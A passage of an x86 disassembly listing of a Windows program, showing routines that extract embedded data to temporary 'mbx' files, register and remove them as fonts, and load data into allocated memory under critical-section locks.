loc_4CF939: ; CODE XREF: sub_4CF818+50�j
; sub_4CF818+103�j
xor eax, eax
loc_4CF93B: ; CODE XREF: sub_4CF818+F8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4CF818
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF94C proc near ; CODE XREF: sub_4DB23E+20�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004CFAAF SIZE 000001F8 BYTES
; FUNCTION CHUNK AT 004CFD11 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE310
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
or [ebp+var_28], 0FFFFFFFFh
and [ebp+var_2C], 0
and [ebp+var_1C], 0
and [ebp+var_24], 0
push 0
lea eax, [ebp+var_20]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_4D0346
test eax, eax
jz loc_4CFD11
cmp [ebp+var_20], 0FFFFFFFFh
jz loc_4CFD11
mov eax, ds:dword_4E18E4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4CF9D0
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_4CF9D4
; ---------------------------------------------------------------------------
loc_4CF9D0: ; CODE XREF: sub_4CF94C+6F�j
and [ebp+var_70], 0
loc_4CF9D4: ; CODE XREF: sub_4CF94C+82�j
movzx eax, [ebp+var_70]
test eax, eax
jz loc_4CFD11
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_20]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
cmp [ebp+var_30], 0
jnz short loc_4CFA1E
push ds:off_4DE4F8
push 22h
push ds:off_4DE4FC
call sub_4D848C
loc_4CFA1E: ; CODE XREF: sub_4CF94C+BD�j
mov eax, ds:dword_4E18E8
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4CFA3F
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_4CFA43
; ---------------------------------------------------------------------------
loc_4CFA3F: ; CODE XREF: sub_4CF94C+DE�j
and [ebp+var_78], 0
loc_4CFA43: ; CODE XREF: sub_4CF94C+F1�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_4CFAAF
mov [ebp+var_4], 1
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4E18E8
call sub_4DB871
test eax, eax
jz short loc_4CFA88
push 0FFFFFFFFh
mov [ebp+var_84], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp loc_4CFD13
; ---------------------------------------------------------------------------
loc_4CFA88: ; CODE XREF: sub_4CF94C+118�j
and [ebp+var_4], 0
call sub_4CFA93
jmp short loc_4CFAAF
sub_4CF94C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4CFA93 proc near ; CODE XREF: sub_4CF94C+140�p
; DATA XREF: _5:004DE324�o
mov eax, ds:dword_4E18E8
mov [ebp-7Ch], eax
cmp dword ptr [ebp-7Ch], 0
jz short locret_4CFAAE
mov eax, [ebp-7Ch]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4CFAAE: ; CODE XREF: sub_4CFA93+C�j
retn
sub_4CFA93 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF94C
loc_4CFAAF: ; CODE XREF: sub_4CF94C+FD�j
; sub_4CF94C+145�j
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
mov [ebp+var_2C], eax
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_54], eax
mov eax, [ebp+var_54]
mov [ebp+var_1C], eax
push [ebp+var_1C]
push 104h
call ds:dword_4E1734 ; GetTempPathA
push [ebp+var_2C]
push 0
push offset aMbx ; "mbx"
push [ebp+var_1C]
call ds:dword_4E1730 ; GetTempFileNameA
push 0
push 0
push 4
push 0
push 1
push 40000000h
push [ebp+var_2C]
call ds:dword_4E16A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4CFB3B
push 0FFFFFFFFh
mov [ebp+var_88], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_88]
jmp loc_4CFD13
; ---------------------------------------------------------------------------
loc_4CFB3B: ; CODE XREF: sub_4CF94C+1CB�j
push 1000h
call sub_4D835A
pop ecx
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
mov [ebp+var_24], eax
and [ebp+var_38], 0
loc_4CFB53: ; CODE XREF: sub_4CF94C+2BF�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
cmp ecx, [eax+8]
jnb loc_4CFC10
mov eax, [ebp+var_34]
mov eax, [eax+8]
mov [ebp+var_48], eax
cmp [ebp+var_48], 1000h
jbe short loc_4CFB7B
mov [ebp+var_48], 1000h
loc_4CFB7B: ; CODE XREF: sub_4CF94C+226�j
lea eax, [ebp+var_40]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push [ebp+var_48]
push [ebp+var_24]
push [ebp+var_20]
call sub_4D1177
test eax, eax
jz short loc_4CFB9D
cmp [ebp+var_40], 0
jnz short loc_4CFBBF
loc_4CFB9D: ; CODE XREF: sub_4CF94C+249�j
push 0FFFFFFFFh
mov [ebp+var_8C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_8C]
jmp loc_4CFD13
; ---------------------------------------------------------------------------
loc_4CFBBF: ; CODE XREF: sub_4CF94C+24F�j
push 0
lea eax, [ebp+var_44]
push eax
push [ebp+var_3C]
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_4E17BC ; WriteFile
test eax, eax
jz short loc_4CFBE0
mov eax, [ebp+var_44]
cmp eax, [ebp+var_3C]
jz short loc_4CFC02
loc_4CFBE0: ; CODE XREF: sub_4CF94C+28A�j
push 0FFFFFFFFh
mov [ebp+var_90], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_90]
jmp loc_4CFD13
; ---------------------------------------------------------------------------
loc_4CFC02: ; CODE XREF: sub_4CF94C+292�j
mov eax, [ebp+var_38]
add eax, [ebp+var_3C]
mov [ebp+var_38], eax
jmp loc_4CFB53
; ---------------------------------------------------------------------------
loc_4CFC10: ; CODE XREF: sub_4CF94C+210�j
push [ebp+var_28]
call ds:dword_4E16A4 ; CloseHandle
or [ebp+var_28], 0FFFFFFFFh
push [ebp+var_2C]
call ds:dword_4E17DC ; AddFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_4CFC3C
push [ebp+var_2C]
call ds:dword_4E16C0 ; DeleteFileA
loc_4CFC3C: ; CODE XREF: sub_4CF94C+2E5�j
push 8
call sub_4D835A
pop ecx
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jz short loc_4CFC67
mov eax, [ebp+var_5C]
and dword ptr [eax], 0
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov eax, [ebp+var_5C]
mov [ebp+var_94], eax
jmp short loc_4CFC6E
; ---------------------------------------------------------------------------
loc_4CFC67: ; CODE XREF: sub_4CF94C+2FF�j
and [ebp+var_94], 0
loc_4CFC6E: ; CODE XREF: sub_4CF94C+319�j
push [ebp+var_94]
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4E18E8
call sub_4CC000
and [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_98], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_98]
jmp short loc_4CFD13
; END OF FUNCTION CHUNK FOR sub_4CF94C
; =============== S U B R O U T I N E =======================================
sub_4CFCA7 proc near ; DATA XREF: _5:004DE318�o
mov eax, ds:dword_4E18E4
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_4CFCC2
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4CFCC2: ; CODE XREF: sub_4CFCA7+C�j
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jz short loc_4CFCD4
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-20h]
call sub_4D0741
loc_4CFCD4: ; CODE XREF: sub_4CFCA7+1F�j
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_4CFCE3
push dword ptr [ebp-28h]
call ds:dword_4E16A4 ; CloseHandle
loc_4CFCE3: ; CODE XREF: sub_4CFCA7+31�j
mov eax, [ebp-2Ch]
mov [ebp-60h], eax
push dword ptr [ebp-60h]
call sub_4D83DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-64h], eax
push dword ptr [ebp-64h]
call sub_4D83DD
pop ecx
mov eax, [ebp-24h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4D83DD
pop ecx
retn
sub_4CFCA7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF94C
loc_4CFD11: ; CODE XREF: sub_4CF94C+53�j
; sub_4CF94C+5D�j ...
xor eax, eax
loc_4CFD13: ; CODE XREF: sub_4CF94C+137�j
; sub_4CF94C+1EA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4CF94C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CFD24 proc near ; CODE XREF: sub_4DB277+20�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE328
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 34h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
and [ebp+var_1C], 0
push 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_4D153F
test eax, eax
jz loc_4CFEBA
movzx eax, [ebp+var_24]
test eax, eax
jnz loc_4CFEBA
mov eax, ds:dword_4E18E8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4CFD98
mov eax, [ebp+var_34]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_38], 1
jmp short loc_4CFD9C
; ---------------------------------------------------------------------------
loc_4CFD98: ; CODE XREF: sub_4CFD24+5F�j
and [ebp+var_38], 0
loc_4CFD9C: ; CODE XREF: sub_4CFD24+72�j
movzx eax, [ebp+var_38]
test eax, eax
jz loc_4CFEBA
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4E18E8
call sub_4DB871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_4CFE88
mov eax, [ebp+var_28]
cmp dword ptr [eax], 0
jz short loc_4CFDE8
push ds:off_4DE4F8
push 70h
push ds:off_4DE4FC
call sub_4D848C
loc_4CFDE8: ; CODE XREF: sub_4CFD24+AF�j
mov eax, [ebp+var_28]
cmp dword ptr [eax+4], 0
jnz short loc_4CFE04
push ds:off_4DE4F8
push 71h
push ds:off_4DE4FC
call sub_4D848C
loc_4CFE04: ; CODE XREF: sub_4CFD24+CB�j
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4E17EC ; RemoveFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4E16C0 ; DeleteFileA
push [ebp+var_1C]
mov ecx, ds:dword_4E18E8
call sub_4DB8E0
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4CFE6B
mov eax, [ebp+var_2C]
mov eax, [eax+4]
mov [ebp+var_3C], eax
push [ebp+var_3C]
call sub_4D83DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4CFE63
push [ebp+var_2C]
call sub_4D83DD
pop ecx
loc_4CFE63: ; CODE XREF: sub_4CFD24+134�j
mov eax, [ebp+var_2C]
mov [ebp+var_44], eax
jmp short loc_4CFE6F
; ---------------------------------------------------------------------------
loc_4CFE6B: ; CODE XREF: sub_4CFD24+118�j
and [ebp+var_44], 0
loc_4CFE6F: ; CODE XREF: sub_4CFD24+145�j
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp short loc_4CFEBC
; ---------------------------------------------------------------------------
loc_4CFE88: ; CODE XREF: sub_4CFD24+A3�j
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp short loc_4CFEBC
; ---------------------------------------------------------------------------
loc_4CFE9E: ; DATA XREF: _5:004DE330�o
mov eax, ds:dword_4E18E8
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jz short locret_4CFEB9
mov eax, [ebp+var_40]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4CFEB9: ; CODE XREF: sub_4CFD24+186�j
retn
; ---------------------------------------------------------------------------
loc_4CFEBA: ; CODE XREF: sub_4CFD24+41�j
; sub_4CFD24+4D�j ...
xor eax, eax
loc_4CFEBC: ; CODE XREF: sub_4CFD24+162�j
; sub_4CFD24+178�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4CFD24 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CFECD proc near ; CODE XREF: sub_4DB55B+B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE338
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov eax, ds:dword_4E18E0
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4CFF13
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4CFF17
; ---------------------------------------------------------------------------
loc_4CFF13: ; CODE XREF: sub_4CFECD+31�j
and [ebp+var_24], 0
loc_4CFF17: ; CODE XREF: sub_4CFECD+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4CFFAC
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E0
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_4CFF54
push 0FFFFFFFFh
and [ebp+var_2C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4CFFAE
; ---------------------------------------------------------------------------
loc_4CFF54: ; CODE XREF: sub_4CFECD+6F�j
push 8000h
push 0
push [ebp+arg_0]
call ds:dword_4E17A8 ; VirtualFree
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
mov ecx, ds:dword_4E18E0
call sub_4DB8E0
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4CFFAE
; ---------------------------------------------------------------------------
loc_4CFF90: ; DATA XREF: _5:004DE340�o
mov eax, ds:dword_4E18E0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short locret_4CFFAB
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4CFFAB: ; CODE XREF: sub_4CFECD+CF�j
retn
; ---------------------------------------------------------------------------
loc_4CFFAC: ; CODE XREF: sub_4CFECD+50�j
xor eax, eax
loc_4CFFAE: ; CODE XREF: sub_4CFECD+85�j
; sub_4CFECD+C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4CFECD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CFFBF proc near ; CODE XREF: sub_4DB51C+17�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE348
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
and [ebp+var_20], 0
mov eax, [ebp+arg_14]
and dword ptr [eax], 0
and [ebp+var_24], 0
mov [ebp+var_1C], 2
mov eax, ds:dword_4E18E4
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4D001A
mov eax, [ebp+var_48]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_4C], 1
jmp short loc_4D001E
; ---------------------------------------------------------------------------
loc_4D001A: ; CODE XREF: sub_4CFFBF+46�j
and [ebp+var_4C], 0
loc_4D001E: ; CODE XREF: sub_4CFFBF+59�j
movzx eax, [ebp+var_4C]
test eax, eax
jz loc_4D0203
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_4D005E
push 0FFFFFFFFh
and [ebp+var_54], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp loc_4D0205
; ---------------------------------------------------------------------------
loc_4D005E: ; CODE XREF: sub_4CFFBF+84�j
mov eax, [ebp+var_28]
mov eax, [eax]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
cmp ecx, [eax+8]
jbe short loc_4D0086
push 57h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
jmp loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D0086: ; CODE XREF: sub_4CFFBF+B8�j
cmp [ebp+arg_10], 0
jnz short loc_4D0098
mov eax, [ebp+var_30]
mov eax, [eax+8]
sub eax, [ebp+arg_C]
mov [ebp+arg_10], eax
loc_4D0098: ; CODE XREF: sub_4CFFBF+CB�j
mov eax, [ebp+arg_10]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4D00B3
push 57h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
jmp loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D00B3: ; CODE XREF: sub_4CFFBF+E5�j
mov eax, [ebp+arg_4]
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jbe short loc_4D00D7
cmp [ebp+var_58], 2
jbe short loc_4D00D0
cmp [ebp+var_58], 0F001Fh
jz short loc_4D00D0
jmp short loc_4D00D7
; ---------------------------------------------------------------------------
loc_4D00D0: ; CODE XREF: sub_4CFFBF+104�j
; sub_4CFFBF+10D�j
mov [ebp+var_1C], 4
loc_4D00D7: ; CODE XREF: sub_4CFFBF+FE�j
; sub_4CFFBF+10F�j
push [ebp+var_1C]
push 1000h
push [ebp+arg_10]
push 0
call ds:dword_4E17A4 ; VirtualAlloc
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4D00F8
jmp loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D00F8: ; CODE XREF: sub_4CFFBF+132�j
cmp [ebp+var_1C], 4
jz short loc_4D0119
lea eax, [ebp+var_38]
push eax
push 4
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4E17AC ; VirtualProtect
test eax, eax
jnz short loc_4D0119
jmp loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D0119: ; CODE XREF: sub_4CFFBF+13D�j
; sub_4CFFBF+153�j
push 0
push 0
push [ebp+arg_C]
push [ebp+arg_0]
call sub_4D0421
and [ebp+var_34], 0
loc_4D012C: ; CODE XREF: sub_4CFFBF+1B4�j
mov eax, [ebp+var_34]
cmp eax, [ebp+arg_10]
jnb short loc_4D0175
and [ebp+var_40], 0
lea eax, [ebp+var_3C]
push eax
push 0
lea eax, [ebp+var_40]
push eax
mov eax, [ebp+arg_10]
sub eax, [ebp+var_34]
push eax
mov eax, [ebp+var_20]
add eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jz short loc_4D0168
cmp [ebp+var_3C], 0
jz short loc_4D0168
cmp [ebp+var_40], 0
jnz short loc_4D016A
loc_4D0168: ; CODE XREF: sub_4CFFBF+19B�j
; sub_4CFFBF+1A1�j
jmp short loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D016A: ; CODE XREF: sub_4CFFBF+1A7�j
mov eax, [ebp+var_34]
add eax, [ebp+var_40]
mov [ebp+var_34], eax
jmp short loc_4D012C
; ---------------------------------------------------------------------------
loc_4D0175: ; CODE XREF: sub_4CFFBF+173�j
cmp [ebp+var_1C], 4
jz short loc_4D0194
lea eax, [ebp+var_44]
push eax
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_4E17AC ; VirtualProtect
test eax, eax
jnz short loc_4D0194
jmp short loc_4D01B8
; ---------------------------------------------------------------------------
loc_4D0194: ; CODE XREF: sub_4CFFBF+1BA�j
; sub_4CFFBF+1D1�j
push [ebp+var_2C]
push [ebp+var_20]
mov ecx, ds:dword_4E18E0
call sub_4CC000
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_20]
mov [eax], ecx
and [ebp+var_20], 0
mov [ebp+var_24], 1
loc_4D01B8: ; CODE XREF: sub_4CFFBF+C2�j
; sub_4CFFBF+EF�j ...
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_4D0205
; ---------------------------------------------------------------------------
loc_4D01D1: ; DATA XREF: _5:004DE350�o
mov eax, ds:dword_4E18E4
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jz short loc_4D01EC
mov eax, [ebp+var_50]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4D01EC: ; CODE XREF: sub_4CFFBF+21E�j
cmp [ebp+var_20], 0
jz short locret_4D0202
push 8000h
push 0
push [ebp+var_20]
call ds:dword_4E17A8 ; VirtualFree
locret_4D0202: ; CODE XREF: sub_4CFFBF+231�j
retn
; ---------------------------------------------------------------------------
loc_4D0203: ; CODE XREF: sub_4CFFBF+65�j
xor eax, eax
loc_4D0205: ; CODE XREF: sub_4CFFBF+9A�j
; sub_4CFFBF+210�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_4CFFBF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0216 proc near ; CODE XREF: sub_4DB4A4+11�p
; sub_4DB4E0+11�p
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D0333 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE358
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, ds:dword_4E18E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4D0262
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4D0266
; ---------------------------------------------------------------------------
loc_4D0262: ; CODE XREF: sub_4D0216+37�j
and [ebp+var_2C], 0
loc_4D0266: ; CODE XREF: sub_4D0216+4A�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4D0333
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D030C
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4E16A8 ; CreateFileA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jz short loc_4D02F3
push 10h
call sub_4D835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
mov esi, [ebp+var_1C]
mov edi, [ebp+var_20]
movsd
movsd
movsd
movsd
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
mov [eax+8], ecx
push [ebp+var_20]
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov ecx, ds:dword_4E18E4
call sub_4DB98E
loc_4D02F3: ; CODE XREF: sub_4D0216+A2�j
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_4D0335
; ---------------------------------------------------------------------------
loc_4D030C: ; CODE XREF: sub_4D0216+75�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D0317
jmp short loc_4D0333
sub_4D0216 endp
; =============== S U B R O U T I N E =======================================
sub_4D0317 proc near ; CODE XREF: sub_4D0216+FA�p
; DATA XREF: _5:004DE360�o
mov eax, ds:dword_4E18E4
mov [ebp-30h], eax
cmp dword ptr [ebp-30h], 0
jz short locret_4D0332
mov eax, [ebp-30h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D0332: ; CODE XREF: sub_4D0317+C�j
retn
sub_4D0317 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0216
loc_4D0333: ; CODE XREF: sub_4D0216+56�j
; sub_4D0216+FF�j
xor eax, eax
loc_4D0335: ; CODE XREF: sub_4D0216+F4�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D0216
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0346 proc near ; CODE XREF: sub_4CC3F3+17�p
; sub_4CF036+39�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
